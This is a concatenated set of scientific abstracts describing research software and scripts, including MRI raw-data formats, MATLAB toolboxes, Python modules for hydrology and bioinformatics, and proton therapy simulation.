Purpose This work proposes the ISMRM Raw Data (ISMRMRD) format as a common MR raw data format, which promotes algorithm and data sharing. Methods A file format consisting of a flexible header and tagged frames of k-space data was designed. Application Programming Interfaces were implemented in C/C++, MATLAB, and Python. Converters for Bruker, General Electric, Philips, and Siemens proprietary file formats were implemented in C++. Raw data were collected using MRI scanners from four vendors, converted to ISMRMRD format, and reconstructed using software implemented in three programming languages (C++, MATLAB, Python). Results Images were obtained by reconstructing the raw data from all vendors. The source code, raw data, and images comprising this work are shared online, serving as an example of an image reconstruction project following a paradigm of reproducible research. Conclusion The proposed raw data format solves a practical problem for the MRI community. It may serve as a foundation for reproducible research and collaborations. The ISMRMRD format is a completely open and community-driven format, and the scientific community is invited (including commercial vendors) to participate either as users or developers. PMID:26822475
Resources for comparing the speed and performance of medical autocoders.
Berman, Jules J
2004-06-15
Concept indexing is a popular method for characterizing medical text, and is one of the most important early steps in many data mining efforts. Concept indexing differs from simple word or phrase indexing because concepts are typically represented by a nomenclature code that binds a medical concept to all equivalent representations. A concept search on the term renal cell carcinoma would be expected to find occurrences of hypernephroma, and renal carcinoma (concept equivalents). The purpose of this study is to provide freely available resources to compare speed and performance among different autocoders. These tools consist of: 1) a public domain autocoder written in Perl (a free and open source programming language that installs on any operating system); 2) a nomenclature database derived from the unencumbered subset of the publicly available Unified Medical Language System; 3) a large corpus of autocoded output derived from a publicly available medical text. A simple lexical autocoder was written that parses plain-text into a listing of all 1,2,3, and 4-word strings contained in text, assigning a nomenclature code for text strings that match terms in the nomenclature. The nomenclature used is the unencumbered subset of the 2003 Unified Medical Language System (UMLS). The unencumbered subset of UMLS was reduced to exclude homonymous one-word terms and proper names, resulting in a term/code data dictionary containing about a half million medical terms. The Online Mendelian Inheritance in Man (OMIM), a 92+ Megabyte publicly available medical opus, was used as sample medical text for the autocoder. The autocoding Perl script is remarkably short, consisting of just 38 command lines. The 92+ Megabyte OMIM file was completely autocoded in 869 seconds on a 2.4 GHz processor (less than 10 seconds per Megabyte of text). The autocoded output file (9,540,442 bytes) contains 367,963 coded terms from OMIM and is distributed with this manuscript. A public domain Perl script is provided that can parse through plain-text files of any length, matching concepts against an external nomenclature. The script and associated files can be used freely to compare the speed and performance of autocoding software.
SOCIB Glider toolbox: from sensor to data repository
NASA Astrophysics Data System (ADS)
Pau Beltran, Joan; Heslop, Emma; Ruiz, Simón; Troupin, Charles; Tintoré, Joaquín
2015-04-01
Nowadays in oceanography, gliders constitutes a mature, cost-effective technology for the acquisition of measurements independently of the sea state (unlike ships), providing subsurface data during sustained periods, including extreme weather events. The SOCIB glider toolbox is a set of MATLAB/Octave scripts and functions developed in order to manage the data collected by a glider fleet. They cover the main stages of the data management process, both in real-time and delayed-time modes: metadata aggregation, downloading, processing, and automatic generation of data products and figures. The toolbox is distributed under the GNU licence (http://www.gnu.org/copyleft/gpl.html) and is available at http://www.socib.es/users/glider/glider_toolbox.
NASA Astrophysics Data System (ADS)
Grzesik, W.; Niesłony, P.; Laskowski, P.
2017-12-01
In this paper, a special procedure for the prediction of parameters of the Johnson-Cook constitutive material models is proposed based on the experimental data and specially developed MATLAB scripts which allow advanced modeling of complex 3D response surfaces. Experimental investigations concern two various strain rates of 10-3 and 101 1/s and the testing temperature ranging from the ambient up to 700 °C. As a result, a set of mathematical equations which fit the experimental data is determined. The applicability of the experimentally derived constitutive models to the FEM modeling of real machining processes of Inconel 718 alloy is verified.
DOVIS 2.0: an efficient and easy to use parallel virtual screening tool based on AutoDock 4.0.
Jiang, Xiaohui; Kumar, Kamal; Hu, Xin; Wallqvist, Anders; Reifman, Jaques
2008-09-08
Small-molecule docking is an important tool in studying receptor-ligand interactions and in identifying potential drug candidates. Previously, we developed a software tool (DOVIS) to perform large-scale virtual screening of small molecules in parallel on Linux clusters, using AutoDock 3.05 as the docking engine. DOVIS enables the seamless screening of millions of compounds on high-performance computing platforms. In this paper, we report significant advances in the software implementation of DOVIS 2.0, including enhanced screening capability, improved file system efficiency, and extended usability. To keep DOVIS up-to-date, we upgraded the software's docking engine to the more accurate AutoDock 4.0 code. We developed a new parallelization scheme to improve runtime efficiency and modified the AutoDock code to reduce excessive file operations during large-scale virtual screening jobs. We also implemented an algorithm to output docked ligands in an industry standard format, sd-file format, which can be easily interfaced with other modeling programs. Finally, we constructed a wrapper-script interface to enable automatic rescoring of docked ligands by arbitrarily selected third-party scoring programs. The significance of the new DOVIS 2.0 software compared with the previous version lies in its improved performance and usability. The new version makes the computation highly efficient by automating load balancing, significantly reducing excessive file operations by more than 95%, providing outputs that conform to industry standard sd-file format, and providing a general wrapper-script interface for rescoring of docked ligands. The new DOVIS 2.0 package is freely available to the public under the GNU General Public License.
HEART: an automated beat-to-beat cardiovascular analysis package using Matlab.
Schroeder, M J Mark J; Perreault, Bill; Ewert, D L Daniel L; Koenig, S C Steven C
2004-07-01
A computer program is described for beat-to-beat analysis of cardiovascular parameters from high-fidelity pressure and flow waveforms. The Hemodynamic Estimation and Analysis Research Tool (HEART) is a post-processing analysis software package developed in Matlab that enables scientists and clinicians to document, load, view, calibrate, and analyze experimental data that have been digitally saved in ascii or binary format. Analysis routines include traditional hemodynamic parameter estimates as well as more sophisticated analyses such as lumped arterial model parameter estimation and vascular impedance frequency spectra. Cardiovascular parameter values of all analyzed beats can be viewed and statistically analyzed. An attractive feature of the HEART program is the ability to analyze data with visual quality assurance throughout the process, thus establishing a framework toward which Good Laboratory Practice (GLP) compliance can be obtained. Additionally, the development of HEART on the Matlab platform provides users with the flexibility to adapt or create study specific analysis files according to their specific needs. Copyright 2003 Elsevier Ltd.
Gene Expression Dynamics Inspector (GEDI): for integrative analysis of expression profiles
NASA Technical Reports Server (NTRS)
Eichler, Gabriel S.; Huang, Sui; Ingber, Donald E.
2003-01-01
Genome-wide expression profiles contain global patterns that evade visual detection in current gene clustering analysis. Here, a Gene Expression Dynamics Inspector (GEDI) is described that uses self-organizing maps to translate high-dimensional expression profiles of time courses or sample classes into animated, coherent and robust mosaics images. GEDI facilitates identification of interesting patterns of molecular activity simultaneously across gene, time and sample space without prior assumption of any structure in the data, and then permits the user to retrieve genes of interest. Important changes in genome-wide activities may be quickly identified based on 'Gestalt' recognition and hence, GEDI may be especially useful for non-specialist end users, such as physicians. AVAILABILITY: GEDI v1.0 is written in Matlab, and binary Matlab.dll files which require Matlab to run can be downloaded for free by academic institutions at http://www.chip.org/ge/gedihome.html Supplementary information: http://www.chip.org/ge/gedihome.html.
Risk Assessment Update: Russian Segment
NASA Technical Reports Server (NTRS)
Christiansen, Eric; Lear, Dana; Hyde, James; Bjorkman, Michael; Hoffman, Kevin
2012-01-01
BUMPER-II version 1.95j source code was provided to RSC-E- and Khrunichev at January 2012 MMOD TIM in Moscow. MEMCxP and ORDEM 3.0 environments implemented as external data files. NASA provided a sample ORDEM 3.0 g."key" & "daf" environment file set for demonstration and benchmarking BUMPER -II v1.95j installation at the Jan-12 TIM. ORDEM 3.0 has been completed and is currently in beta testing. NASA will provide a preliminary set of ORDEM 3.0 ".key" & ".daf" environment files for the years 2012 through 2028. Bumper output files produced using the new ORDEM 3.0 data files are intended for internal use only, not for requirements verification. Output files will contain these words ORDEM FILE DESCRIPTION = PRELIMINARY VERSION: not for production. The projectile density term in many BUMPER-II ballistic limit equations will need to be updated. Cube demo scripts and output files delivered at the Jan-12 TIM have been updated for the new ORDEM 3.0 data files. Risk assessment results based on ORDEM 3.0 and MEM will be presented for the Russian Segment (RS) of ISS.
NASA Technical Reports Server (NTRS)
2008-01-01
The Aquarius Radiometer, a subsystem of the Aquarius Instrument required a data acquisition ground system to support calibration and radiometer performance assessment. To support calibration and compose performance assessments, we developed an automated system which uploaded raw data to a ftp server and saved raw and processed data to a database. This paper details the overall functionalities of the Aquarius Instrument Science Data System (ISDS) and the individual electrical ground support equipment (EGSE) which produced data files that were infused into the ISDS. Real time EGSEs include an ICDS Simulator, Calibration GSE, Labview controlled power supply, and a chamber data acquisition system. ICDS Simulator serves as a test conductor primary workstation, collecting radiometer housekeeping (HK) and science data and passing commands and HK telemetry collection request to the radiometer. Calibration GSE (Radiometer Active Test Source) provides source choice from multiple targets for the radiometer external calibration. Power Supply GSE, controlled by labview, provides real time voltage and current monitoring of the radiometer. And finally the chamber data acquisition system produces data reflecting chamber vacuum pressure, thermistor temperatures, AVG and watts. Each GSE system produce text based data files every two to six minutes and automatically copies the data files to the Central Archiver PC. The Archiver PC stores the data files, schedules automated uploads of these files to an external FTP server, and accepts request to copy all data files to the ISDS for offline data processing and analysis. Aquarius Radiometer ISDS contains PHP and MATLab programs to parse, process and save all data to a MySQL database. Analysis tools (MATLab programs) in the ISDS system are capable of displaying radiometer science, telemetry and auxiliary data in near real time as well as performing data analysis and producing automated performance assessment reports of the Aquarius Radiometer.
NASA Technical Reports Server (NTRS)
Dooling, Robert J.
2012-01-01
NASA Engineering's Orion Script Generator (OSG) is a program designed to run on Exploration Flight Test One Software. The script generator creates a SuperScript file that, when run, accepts the filename for a listing of Compact Unique Identifiers (CUIs). These CUIs will correspond to different variables on the Orion spacecraft, such as the temperature of a component X, the active or inactive status of another component Y, and so on. OSG will use a linked database to retrieve the value for each CUI, such as "100 05," "True," and so on. Finally, OSG writes SuperScript code to display each of these variables before outputting the ssi file that allows recipients to view a graphical representation of Orion Flight Test One's status through these variables. This project's main challenge was creating flexible software that accepts and transfers many types of data, from Boolean (true or false) values to "Unsigned Long Long'' values (any number from 0 to 18,446,744,073,709,551,615). We also needed to allow bit manipulation for each variable, requiring us to program functions that could convert any of the multiple types of data into binary code. Throughout the project, we explored different methods to optimize the speed of working with the CUI database and long binary numbers. For example, the program handled extended binary numbers much more efficiently when we stored them as collections of Boolean values (true or false representing 1 or 0) instead of as collections of character strings or numbers. We also strove to make OSG as user-friendly and accommodating of different needs as possible its default behavior is to display a current CUI's maximum value and minimum value with three to five intermediate values in between, all in descending order. Fortunately, users can also add other input on the same lines as each CUI name to request different high values, low values, display options (ascending, sine, and so on), and interval sizes for generating intermediate values. Developing input validation took up quite a bit of time, but OSG's flexibility in the end was worth it.
Data Provenance as a Tool for Debugging Hydrological Models based on Python
NASA Astrophysics Data System (ADS)
Wombacher, A.; Huq, M.; Wada, Y.; Van Beek, R.
2012-12-01
There is an increase in data volume used in hydrological modeling. The increasing data volume requires additional efforts in debugging models since a single output value is influenced by a multitude of input values. Thus, it is difficult to keep an overview among the data dependencies. Further, knowing these dependencies, it is a tedious job to infer all the relevant data values. The aforementioned data dependencies are also known as data provenance, i.e. the determination of how a particular value has been created and processed. The proposed tool infers the data provenance automatically from a python script and visualizes the dependencies as a graph without executing the script. To debug the model the user specifies the value of interest in space and time. The tool infers all related data values and displays them in the graph. The tool has been evaluated by hydrologists developing a model for estimating the global water demand [1]. The model uses multiple different data sources. The script we analysed has 120 lines of codes and used more than 3000 individual files, each of them representing a raster map of 360*720 cells. After importing the data of the files into a SQLite database, the data consumes around 40 GB of memory. Using the proposed tool a modeler is able to select individual values and infer which values have been used to calculate the value. Especially in cases of outliers or missing values it is a beneficial tool to provide the modeler with efficient information to investigate the unexpected behavior of the model. The proposed tool can be applied to many python scripts and has been tested with other scripts in different contexts. In case a python code contains an unknown function or class the tool requests additional information about the used function or class to enable the inference. This information has to be entered only once and can be shared with colleagues or in the community. Reference [1] Y. Wada, L. P. H. van Beek, D. Viviroli, H. H. Drr, R. Weingartner, and M. F. P. Bierkens, "Global monthly water stress: II. water demand and severity of water," Water Resources Research, vol. 47, 2011.
Parallel File System I/O Performance Testing On LANL Clusters
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wiens, Isaac Christian; Green, Jennifer Kathleen
2016-08-18
These are slides from a presentation on parallel file system I/O performance testing on LANL clusters. I/O is a known bottleneck for HPC applications. Performance optimization of I/O is often required. This summer project entailed integrating IOR under Pavilion and automating the results analysis. The slides cover the following topics: scope of the work, tools utilized, IOR-Pavilion test workflow, build script, IOR parameters, how parameters are passed to IOR, *run_ior: functionality, Python IOR-Output Parser, Splunk data format, Splunk dashboard and features, and future work.
Laamrani, Ahmed; Branson, Dave; Joosse, Pamela
2018-01-01
Quantifying the amount of crop residue left in the field after harvest is a key issue for sustainability. Conventional assessment approaches (e.g., line-transect) are labor intensive, time-consuming and costly. Many proximal remote sensing devices and systems have been developed for agricultural applications such as cover crop and residue mapping. For instance, current mobile devices (smartphones & tablets) are usually equipped with digital cameras and global positioning systems and use applications (apps) for in-field data collection and analysis. In this study, we assess the feasibility and strength of a mobile device app developed to estimate crop residue cover. The performance of this novel technique (from here on referred to as “app” method) was compared against two point counting approaches: an established digital photograph-grid method and a new automated residue counting script developed in MATLAB at the University of Guelph. Both photograph-grid and script methods were used to count residue under 100 grid points. Residue percent cover was estimated using the app, script and photograph-grid methods on 54 vertical digital photographs (images of the ground taken from above at a height of 1.5 m) collected from eighteen fields (9 corn and 9 soybean, 3 samples each) located in southern Ontario. Results showed that residue estimates from the app method were in good agreement with those obtained from both photograph–grid and script methods (R2 = 0.86 and 0.84, respectively). This study has found that the app underestimates the residue coverage by −6.3% and −10.8% when compared to the photograph-grid and script methods, respectively. With regards to residue type, soybean has a slightly lower bias than corn (i.e., −5.3% vs. −7.4%). For photos with residue <30%, the app derived residue measurements are within ±5% difference (bias) of both photograph-grid- and script-derived residue measurements. These methods could therefore be used to track the recommended minimum soil residue cover of 30%, implemented to reduce farmland topsoil and nutrient losses that impact water quality. Overall, the app method was found to be a good alternative to the point counting methods, which are more time-consuming. PMID:29495497
SnopViz, an interactive snow profile visualization tool
NASA Astrophysics Data System (ADS)
Fierz, Charles; Egger, Thomas; gerber, Matthias; Bavay, Mathias; Techel, Frank
2016-04-01
SnopViz is a visualization tool for both simulation outputs of the snow-cover model SNOWPACK and observed snow profiles. It has been designed to fulfil the needs of operational services (Swiss Avalanche Warning Service, Avalanche Canada) as well as offer the flexibility required to satisfy the specific needs of researchers. This JavaScript application runs on any modern browser and does not require an active Internet connection. The open source code is available for download from models.slf.ch where examples can also be run. Both the SnopViz library and the SnopViz User Interface will become a full replacement of the current research visualization tool SN_GUI for SNOWPACK. The SnopViz library is a stand-alone application that parses the provided input files, for example, a single snow profile (CAAML file format) or multiple snow profiles as output by SNOWPACK (PRO file format). A plugin architecture allows for handling JSON objects (JavaScript Object Notation) as well and plugins for other file formats may be added easily. The outputs are provided either as vector graphics (SVG) or JSON objects. The SnopViz User Interface (UI) is a browser based stand-alone interface. It runs in every modern browser, including IE, and allows user interaction with the graphs. SVG, the XML based standard for vector graphics, was chosen because of its easy interaction with JS and a good software support (Adobe Illustrator, Inkscape) to manipulate graphs outside SnopViz for publication purposes. SnopViz provides new visualization for SNOWPACK timeline output as well as time series input and output. The actual output format for SNOWPACK timelines was retained while time series are read from SMET files, a file format used in conjunction with the open source data handling code MeteoIO. Finally, SnopViz is able to render single snow profiles, either observed or modelled, that are provided as CAAML-file. This file format (caaml.org/Schemas/V5.0/Profiles/SnowProfileIACS) is an international standard to exchange snow profile data. It is supported by the International Association of Cryospheric Sciences (IACS) and was developed in collaboration with practitioners (Avalanche Canada).
A Low-Cost Real Color Picker Based on Arduino
Agudo, Juan Enrique; Pardo, Pedro J.; Sánchez, Héctor; Pérez, Ángel Luis; Suero, María Isabel
2014-01-01
Color measurements have traditionally been linked to expensive and difficult to handle equipment. The set of mathematical transformations that are needed to transfer a color that we observe in any object that doesn't emit its own light (which is usually called a color-object) so that it can be displayed on a computer screen or printed on paper is not at all trivial. This usually requires a thorough knowledge of color spaces, colorimetric transformations and color management systems. The TCS3414CS color sensor (I2C Sensor Color Grove), a system for capturing, processing and color management that allows the colors of any non-self-luminous object using a low-cost hardware based on Arduino, is presented in this paper. Specific software has been developed in Matlab and a study of the linearity of chromatic channels and accuracy of color measurements for this device has been undertaken. All used scripts (Arduino and Matlab) are attached as supplementary material. The results show acceptable accuracy values that, although obviously do not reach the levels obtained with the other scientific instruments, for the price difference they present a good low cost option. PMID:25004152
PLATSIM: An efficient linear simulation and analysis package for large-order flexible systems
NASA Technical Reports Server (NTRS)
Maghami, Periman; Kenny, Sean P.; Giesy, Daniel P.
1995-01-01
PLATSIM is a software package designed to provide efficient time and frequency domain analysis of large-order generic space platforms implemented with any linear time-invariant control system. Time domain analysis provides simulations of the overall spacecraft response levels due to either onboard or external disturbances. The time domain results can then be processed by the jitter analysis module to assess the spacecraft's pointing performance in a computationally efficient manner. The resulting jitter analysis algorithms have produced an increase in speed of several orders of magnitude over the brute force approach of sweeping minima and maxima. Frequency domain analysis produces frequency response functions for uncontrolled and controlled platform configurations. The latter represents an enabling technology for large-order flexible systems. PLATSIM uses a sparse matrix formulation for the spacecraft dynamics model which makes both the time and frequency domain operations quite efficient, particularly when a large number of modes are required to capture the true dynamics of the spacecraft. The package is written in MATLAB script language. A graphical user interface (GUI) is included in the PLATSIM software package. This GUI uses MATLAB's Handle graphics to provide a convenient way for setting simulation and analysis parameters.
Optimization Routine for Generating Medical Kits for Spaceflight Using the Integrated Medical Model
NASA Technical Reports Server (NTRS)
Graham, Kimberli; Myers, Jerry; Goodenow, Deb
2017-01-01
The Integrated Medical Model (IMM) is a MATLAB model that provides probabilistic assessment of the medical risk associated with human spaceflight missions.Different simulations or profiles can be run in which input conditions regarding both mission characteristics and crew characteristics may vary. For each simulation, the IMM records the total medical events that occur and “treats” each event with resources drawn from import scripts. IMM outputs include Total Medical Events (TME), Crew Health Index (CHI), probability of Evacuation (pEVAC), and probability of Loss of Crew Life (pLOCL).The Crew Health Index is determined by the amount of quality time lost (QTL). Previously, an optimization code was implemented in order to efficiently generate medical kits. The kits were optimized to have the greatest benefit possible, given amass and/or volume constraint. A 6-crew, 14-day lunar mission was chosen for the simulation and run through the IMM for 100,000 trials. A built-in MATLAB solver, mixed-integer linear programming, was used for the optimization routine. Kits were generated in 10% increments ranging from 10%-100% of the benefit constraints. Conditions wheremass alone was minimized, volume alone was minimized, and where mass and volume were minimizedjointly were tested.
A low-cost real color picker based on Arduino.
Agudo, Juan Enrique; Pardo, Pedro J; Sánchez, Héctor; Pérez, Ángel Luis; Suero, María Isabel
2014-07-07
Color measurements have traditionally been linked to expensive and difficult to handle equipment. The set of mathematical transformations that are needed to transfer a color that we observe in any object that doesn't emit its own light (which is usually called a color-object) so that it can be displayed on a computer screen or printed on paper is not at all trivial. This usually requires a thorough knowledge of color spaces, colorimetric transformations and color management systems. The TCS3414CS color sensor (I2C Sensor Color Grove), a system for capturing, processing and color management that allows the colors of any non-self-luminous object using a low-cost hardware based on Arduino, is presented in this paper. Specific software has been developed in Matlab and a study of the linearity of chromatic channels and accuracy of color measurements for this device has been undertaken. All used scripts (Arduino and Matlab) are attached as supplementary material. The results show acceptable accuracy values that, although obviously do not reach the levels obtained with the other scientific instruments, for the price difference they present a good low cost option.
NASA Astrophysics Data System (ADS)
1997-07-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Joining capacitors R Bridges King Edward's School, Birmingham B15 2UA, UK Enjoying Physics John Bausor 5 Longcrofte Road, Edgware, Middlesex HA8 6RR, UK The disadvantages of success M L Cooper Newham College of Further Education, London
Design, Development, and Testing of a Network Frequency Selection Service (NFSS)
1994-02-14
mercial simulation software (Sim++), word processor ( FrameMaker ), editor (Gnu Emacs), software ver- sion control (Revision Control System (RCS)), system...of FrameMaker ".mif" files. When viewed using FrameMaker or a PostScript reader, each page of results appears as two columns by four rows of graphics
Internet Wargaming with Distributed Processing Using the Client-Server Model
1997-03-01
in for war game development . There are tool kits for writing binary files that are interpreted by a particular plug-in. The most popular plug-in set...multi-player game development , the speed with which the environment is changing should be taken into 35 account. For this project JavaScript was chosen
The IBM PC as an Online Search Machine. Part 5: Searching through Crosstalk.
ERIC Educational Resources Information Center
Kolner, Stuart J.
1985-01-01
This last of a five-part series on using the IBM personal computer for online searching highlights a brief review, search process, making the connection, switching between screens and modes, online transaction, capture buffer controls, coping with options, function keys, script files, processing downloaded information, note to TELEX users, and…
p3d--Python module for structural bioinformatics.
Fufezan, Christian; Specht, Michael
2009-08-21
High-throughput bioinformatic analysis tools are needed to mine the large amount of structural data via knowledge based approaches. The development of such tools requires a robust interface to access the structural data in an easy way. For this the Python scripting language is the optimal choice since its philosophy is to write an understandable source code. p3d is an object oriented Python module that adds a simple yet powerful interface to the Python interpreter to process and analyse three dimensional protein structure files (PDB files). p3d's strength arises from the combination of a) very fast spatial access to the structural data due to the implementation of a binary space partitioning (BSP) tree, b) set theory and c) functions that allow to combine a and b and that use human readable language in the search queries rather than complex computer language. All these factors combined facilitate the rapid development of bioinformatic tools that can perform quick and complex analyses of protein structures. p3d is the perfect tool to quickly develop tools for structural bioinformatics using the Python scripting language.
Chapter 21: Programmatic Interfaces - STILTS
NASA Astrophysics Data System (ADS)
Fitzpatrick, M. J.
STILTS is the Starlink Tables Infrastructure Library Tool Set developed by Mark Taylor of the former Starlink Project. STILTS is a command-line tool (see the NVOSS_HOME/bin/stilts command) providing access to the same functionality driving the TOPCAT application and can be run using either the STILTS-specific jar file, or the more general TOPCAT jar file (both are available in the NVOSS_HOME/java/lib directory and are included in the default software environment classpath). The heart of both STILTS and TOPCAT is the STIL Java library. STIL is designed to efficiently handle the input, output and processing of very large tabular datasets and the STILTS task interface makes it an ideal tool for the scripting environment. Multiple formats are supported (including FITS Binary Tables, VOTable, CSV, SQL databases and ASCII, amongst others) and while some tools will generically handle all supported formats, others are specific to the VOTable format. Converting a VOTable to a more script-friendly format is the first thing most users will encounter, but there are many other useful tools as well.
A Python Script to Compute Isochrones for MODFLOW.
Feo, Alessandra; Zanini, Andrea; Petrella, Emma; Celico, Fulvio
2018-03-01
MODFLOW constitutes today the most popular modeling tool in the study of water flow in aquifers and in modeling aquifers. To simplify the interface to MODFLOW various GUI have been developed for the creation of model definition files and for the visualization and interpretation of results. Recently Bakker et al. (2016) developed the FloPy interface to MODFLOW that allows to import and use the produced simulation data using Python. This allows to construct model input files, run the models, read and plot simulations results through Python scripts. In this note, we present a Python program (that uses FloPy) interface that allows us to generate time-related capture zones (isochrones) for confined 2D steady-state groundwater flow in unbounded domains, with one or more wells. As an application, we show a validation of the approach and the results of four basic test cases: a homogenous aquifer with one well, a heterogeneous aquifer with one well, an aquifer with four wells located both longitudinal and perpendicular to the flow direction. © 2017, National Ground Water Association.
A step-by-step solution for embedding user-controlled cines into educational Web pages.
Cornfeld, Daniel
2008-03-01
The objective of this article is to introduce a simple method for embedding user-controlled cines into a Web page using a simple JavaScript. Step-by-step instructions are included and the source code is made available. This technique allows the creation of portable Web pages that allow the user to scroll through cases as if seated at a PACS workstation. A simple JavaScript allows scrollable image stacks to be included on Web pages. With this technique, you can quickly and easily incorporate entire stacks of CT or MR images into online teaching files. This technique has the potential for use in case presentations, online didactics, teaching archives, and resident testing.
VESL: The Virtual Earth Sheet Laboratory for Ice Sheet Modeling and Visualization
NASA Astrophysics Data System (ADS)
Cheng, D. L. C.; Larour, E. Y.; Quinn, J. D.; Halkides, D. J.
2016-12-01
We introduce the Virtual Earth System Laboratory (VESL), a scientific modeling and visualization tool delivered through an integrated web portal for dissemination of data, simulation of physical processes, and promotion of climate literacy. The current prototype leverages NASA's Ice Sheet System Model (ISSM), a state-of-the-art polar ice sheet dynamics model developed at the Jet Propulsion Lab and UC Irvine. We utilize the Emscripten source-to-source compiler to convert the C/C++ ISSM engine core to JavaScript, and bundled pre/post-processing JS scripts to be compatible with the existing ISSM Python/Matlab API. Researchers using VESL will be able to effectively present their work for public dissemination with little-to-no additional post-processing. This will allow for faster publication in peer-reviewed journals and adaption of results for educational applications. Through future application of this concept to multiple aspects of the Earth System, VESL has the potential to broaden data applications in the geosciences and beyond. At this stage, we seek feedback from the greater scientific and public outreach communities regarding the ease of use and feature set of VESL, as we plan its expansion, and aim to achieve more rapid communication and presentation of scientific results.
Artimovich, Elena; Jackson, Russell K; Kilander, Michaela B C; Lin, Yu-Chih; Nestor, Michael W
2017-10-16
Intracellular calcium is an important ion involved in the regulation and modulation of many neuronal functions. From regulating cell cycle and proliferation to initiating signaling cascades and regulating presynaptic neurotransmitter release, the concentration and timing of calcium activity governs the function and fate of neurons. Changes in calcium transients can be used in high-throughput screening applications as a basic measure of neuronal maturity, especially in developing or immature neuronal cultures derived from stem cells. Using human induced pluripotent stem cell derived neurons and dissociated mouse cortical neurons combined with the calcium indicator Fluo-4, we demonstrate that PeakCaller reduces type I and type II error in automated peak calling when compared to the oft-used PeakFinder algorithm under both basal and pharmacologically induced conditions. Here we describe PeakCaller, a novel MATLAB script and graphical user interface for the quantification of intracellular calcium transients in neuronal cultures. PeakCaller allows the user to set peak parameters and smoothing algorithms to best fit their data set. This new analysis script will allow for automation of calcium measurements and is a powerful software tool for researchers interested in high-throughput measurements of intracellular calcium.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Tien, C; Brewer, M; Studenski, M
Purpose: Dynamic-jaw tracking maximizes the area blocked by both jaw and MLC in RapidArc. We developed a method to quantify jaw tracking. Methods: An Eclipse Scripting API (ESAPI) was used to export beam parameters for each arc’s control points. The specific beam parameters extracted were: gantry angle, control point number, meterset, x-jaw positions, y-jaw positions, MLC bank-number, MLC leaf-number, and MLC leaf-position. Each arc contained 178 control points with 120 MLC positions. MATLAB routines were written to process these parameters in order to calculate both the beam aperture (unblocked) size for each control point. An average aperture size was weightedmore » by meterset. Jaw factor was defined as the ratio between dynamic-jaw to static-jaw aperture size. Jaw factor was determined for forty retrospectively replanned patients treated with static-jaw delivery sites including lung, brain, prostate, H&N, rectum, and bladder. Results: Most patients had multiple arcs and reduced-field boosts, resulting in 151 fields. Of these, the lowest (0.4722) and highest (0.9622) jaw factor was observed in prostate and rectal cases, respectively. The median jaw factor was 0.7917 meaning there is the potential unincreased blocking by 20%. Clinically, the dynamic-jaw tracking represents an area surrounding the target which would receive MLC-only leakage transmission of 1.68% versus 0.1% with jaws. Jaw-tracking was more pronounced at areas farther from the target. In prostate patients, the rectum and bladder had 5.5% and 6.3% lower mean dose, respectively; the structures closer to the prostate such as the rectum and bladder both had 1.4% lower mean dose. Conclusion: A custom ESAPI script was coupled with a MATLAB routine in order to extract beam parameters from static-jaw plans and their replanned dynamic-jaw deliveries. The effects were quantified using jaw factor which is the ratio between the meterset weighted aperture size for dynamic-jaw fields versus static-jaw fields.« less
Sample Analysis at Mars Instrument Simulator
NASA Technical Reports Server (NTRS)
Benna, Mehdi; Nolan, Tom
2013-01-01
The Sample Analysis at Mars Instrument Simulator (SAMSIM) is a numerical model dedicated to plan and validate operations of the Sample Analysis at Mars (SAM) instrument on the surface of Mars. The SAM instrument suite, currently operating on the Mars Science Laboratory (MSL), is an analytical laboratory designed to investigate the chemical and isotopic composition of the atmosphere and volatiles extracted from solid samples. SAMSIM was developed using Matlab and Simulink libraries of MathWorks Inc. to provide MSL mission planners with accurate predictions of the instrument electrical, thermal, mechanical, and fluid responses to scripted commands. This tool is a first example of a multi-purpose, full-scale numerical modeling of a flight instrument with the purpose of supplementing or even eliminating entirely the need for a hardware engineer model during instrument development and operation. SAMSIM simulates the complex interactions that occur between the instrument Command and Data Handling unit (C&DH) and all subsystems during the execution of experiment sequences. A typical SAM experiment takes many hours to complete and involves hundreds of components. During the simulation, the electrical, mechanical, thermal, and gas dynamics states of each hardware component are accurately modeled and propagated within the simulation environment at faster than real time. This allows the simulation, in just a few minutes, of experiment sequences that takes many hours to execute on the real instrument. The SAMSIM model is divided into five distinct but interacting modules: software, mechanical, thermal, gas flow, and electrical modules. The software module simulates the instrument C&DH by executing a customized version of the instrument flight software in a Matlab environment. The inputs and outputs to this synthetic C&DH are mapped to virtual sensors and command lines that mimic in their structure and connectivity the layout of the instrument harnesses. This module executes, and thus validates, complex command scripts prior to their up-linking to the SAM instrument. As an output, this module generates synthetic data and message logs at a rate that is similar to the actual instrument.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Moskvin, V; Pirlepesov, F; Tsiamas, P
Purpose: This study provides an overview of the design and commissioning of the Monte Carlo (MC) model of the spot-scanning proton therapy nozzle and its implementation for the patient plan simulation. Methods: The Hitachi PROBEAT V scanning nozzle was simulated based on vendor specifications using the TOPAS extension of Geant4 code. FLUKA MC simulation was also utilized to provide supporting data for the main simulation. Validation of the MC model was performed using vendor provided data and measurements collected during acceptance/commissioning of the proton therapy machine. Actual patient plans using CT based treatment geometry were simulated and compared to themore » dose distributions produced by the treatment planning system (Varian Eclipse 13.6), and patient quality assurance measurements. In-house MATLAB scripts are used for converting DICOM data into TOPAS input files. Results: Comparison analysis of integrated depth doses (IDDs), therapeutic ranges (R90), and spot shape/sizes at different distances from the isocenter, indicate good agreement between MC and measurements. R90 agreement is within 0.15 mm across all energy tunes. IDDs and spot shapes/sizes differences are within statistical error of simulation (less than 1.5%). The MC simulated data, validated with physical measurements, were used for the commissioning of the treatment planning system. Patient geometry simulations were conducted based on the Eclipse produced DICOM plans. Conclusion: The treatment nozzle and standard option beam model were implemented in the TOPAS framework to simulate a highly conformal discrete spot-scanning proton beam system.« less
Nestly--a framework for running software with nested parameter choices and aggregating results.
McCoy, Connor O; Gallagher, Aaron; Hoffman, Noah G; Matsen, Frederick A
2013-02-01
The execution of a software application or pipeline using various combinations of parameters and inputs is a common task in bioinformatics. In the absence of a specialized tool to organize, streamline and formalize this process, scientists must write frequently complex scripts to perform these tasks. We present nestly, a Python package to facilitate running tools with nested combinations of parameters and inputs. nestly provides three components. First, a module to build nested directory structures corresponding to choices of parameters. Second, the nestrun script to run a given command using each set of parameter choices. Third, the nestagg script to aggregate results of the individual runs into a CSV file, as well as support for more complex aggregation. We also include a module for easily specifying nested dependencies for the SCons build tool, enabling incremental builds. Source, documentation and tutorial examples are available at http://github.com/fhcrc/nestly. nestly can be installed from the Python Package Index via pip; it is open source (MIT license).
